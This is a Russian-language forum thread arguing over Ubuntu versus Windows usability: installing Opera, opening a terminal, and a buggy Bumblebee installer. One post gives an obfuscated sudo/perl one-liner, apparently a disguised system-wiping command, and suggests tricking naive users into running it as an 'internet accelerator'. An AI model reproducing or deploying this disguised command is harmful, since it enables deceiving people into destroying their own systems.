им лучше убунта где две кнопки нажал и прога поставилась
Ну поставь мне последнюю оперу из реп
База сама по себе сплошной скрипт (с) AleksK
При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка
Неактивен
Ну поставь мне последнюю оперу из реп
Зачем хомяку последния опера? ему что текущий версии из репы не хватит?
Неактивен
А расскажите мну плз, как в Убунте вызвать, допустим, консольку, не прибегая к помощи клавиатуры...
эммм, в кубунту Программы->служебные->терминал
в убунту тоже программы->служебные->терминал
А что? Кстате в винде мне проще пуск->cmd->Enter
Неактивен
там рука устанет ломать у хомячка.
Имхо, в обзоре было показано, что там и ломать ничего не надо, и так всё работает через задницу. Но если хотите - вот пример:
sudo echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Как Вы думаете, хомячок введёт свой пароль, если ему скажут, что это ускоритель интернета? Правда, убунта ломается легко?
Ах, да, тут -no-preserve-root не закодировано... Думаю, Вы понимаете, что добавить это не сложно.
Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Для Rector: В дальнейшем буду Вас просто игнорировать.
Неактивен
А есть ли опера в репах?
При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка
Неактивен
Это кто будет консоль вызывать? домашний хомячок?
Ну, ёпрст... Мне нужна была консоль, я не нашёл, как её вызвать, не прибегая к клавиатуре, поэтому и спросил именно про неё... Вы слово "допустим" не заметили, да?
Для Director-cemetery: Пока не почешетесь извиниться, Ваши комментарии буду игнорировать.
Неактивен
Это кто будет консоль вызывать? домашний хомячок?
Ну тогда установи мне последнюю оперу в бубунте или qutim, ведь домашнему хомячку надо IM?
Неактивен
Имхо, в обзоре было показано, что там и ломать ничего не надо, и так всё работает через задницу.
Про обзор я писал что писатель сего опуса обгадился по полной.
Неактивен
Неактивен
нее, не хватит, он же хомяк, ему самое последнее нужно.
Как Вы думаете, хомячок введёт свой пароль, если ему скажут, что это ускоритель интернета? Правда, убунта ломается легко?
Ах, да, тут -no-preserve-root не закодировано... Думаю, Вы понимаете, что добавить это не сложно.
Нее, не понимает, он даже спелчекер не осиил установить.
Неактивен
Вторая часть моего поста была стыдливо замолчана? Или Вы решили обгадиться за компанию с ТСом?
Неактивен
ПРУФ?
Неактивен
А пруфы будут?
На что?
Неактивен
На что?
На то что ТС обгадился.
И да, скажи пожалйста, а какая версия оперы в репах убунты? Хомячки интересуются.
Неактивен
Да сломать можно что угодно, здесь я с вами согласен, но все же тяжелее.
Неактивен
но все же тяжелее.
Я только что привёл элементарный пример.
А по поводу сломать - была где-то тут неподалёку хорошая фраза:
- Либо Вы признаёте, что в Linux нельзя засрать систему - и он тем самым ограничивает свободу пользователя, либо признаёте, что можно - и не гордитесь.
Неактивен
пока вы тут спорите, крупные фирмы Apple, Google, Adobe, Sun,
AMD, NVIDIA, Cray, DreamWorks Animation, VMWare, ARM хотят свалить с компилятора gcc на Clang, по одной причине, GPL 3
Даже дистрибутивы линукс
крах GNU уже близко, уже есть виндекапец, нокиакапец, и будет GNUкапец
Неактивен
И да, скажи пожалйста, а какая версия оперы в репах убунты? Хомячки интересуются.
Опера не включена в репы убунты.
На то что ТС обгадился.
Почитай #306 там все расписано.
Неактивен
Да сломать можно что угодно, здесь я с вами согласен, но все же тяжелее.
Тяжелее? Не сказал бы. Иногда для того, чтобы что-то сломать, даже стараться не нужно - за юзера постараются другие:
https://habrahabr.ru/post/122020/
Автор драйверов Bumblebee (поддержка Nvidia Optimus под Linux) просит прощения у всех пользователей, которые скачали и установили последнюю версию 1.4.31. Из-за досадной опечатки в скрипте инсталлятора у пользователей была случайно удалена папка /usr.
Ничего страшного, на Linux такое бывает с кем угодно — всего лишь лишний пробел в скрипте. Баг уже закоммичен и исправлен.
На мой взгляд, яркий пример качества опенсорс-разработки. Остаётся за кадром, где же были те тысячи пар зорких глаз, которые читают исходники?
Редактировался Tritus (22-05-12 16:59:14)
Неактивен
Почитай #306 там все расписано.
Нашёл много придирок к словам. И ничего больше. Имхо, это Вы обгадились в этом комменте.
Неактивен
- Либо Вы признаёте, что в Linux нельзя засрать систему - и он тем самым ограничивает свободу пользователя, либо признаёте, что можно - и не гордитесь.
Веселое высказывание, скользкое как и все аргументы виндузятников.
Неактивен
Опера не включена в репы убунты.
Это понятно, значит процесс (если повезёт в поделиях овер9000 ) в убунте не будет отличаться от установки в винде. Во многих поделиях оперу будете устанавливать из сорцов
или изобретать треугольные колёса, стуча в бубен
Одно ясно, что парой кликов не обойдёшься
им лучше убунта где две кнопки нажал и прога поставилась.
Это вот вы называете швабодкой и изюмительной лёхкостью с юзабилити ?
Это всего лишь маленький пример одного единственного приложения Для windows приложений на порядки!!! больше чем в поделиях. Их просто н-е-в-о-з-м-о-ж-н-о ВСЕ засунуть в репы. Впрочем и в поделиях далеко не всё лежит в репах....
Редактировался selenscy (22-05-12 17:14:27)
Неактивен
Нашёл много придирок к словам.
Нет не к словам, а к методике обзора особено про сравнение работы гимпа ага версию 2.6 с 2.8 и тут вопрос внезапно, а ведь весь обзор соплями склеен, а вы бедолаги от радости запрыгали, не заметив какую свинью вам подложили.
Неактивен
Увидел скриншот себя с убунтовского форума, решил зарегаться. Всем прувет!
Давненько вас почитываю.
Случайности не случайны.
Неактивен
Увидел скриншот себя с убунтовского форума, решил зарегаться. Всем прувет!
Привет новичкам .
Неактивен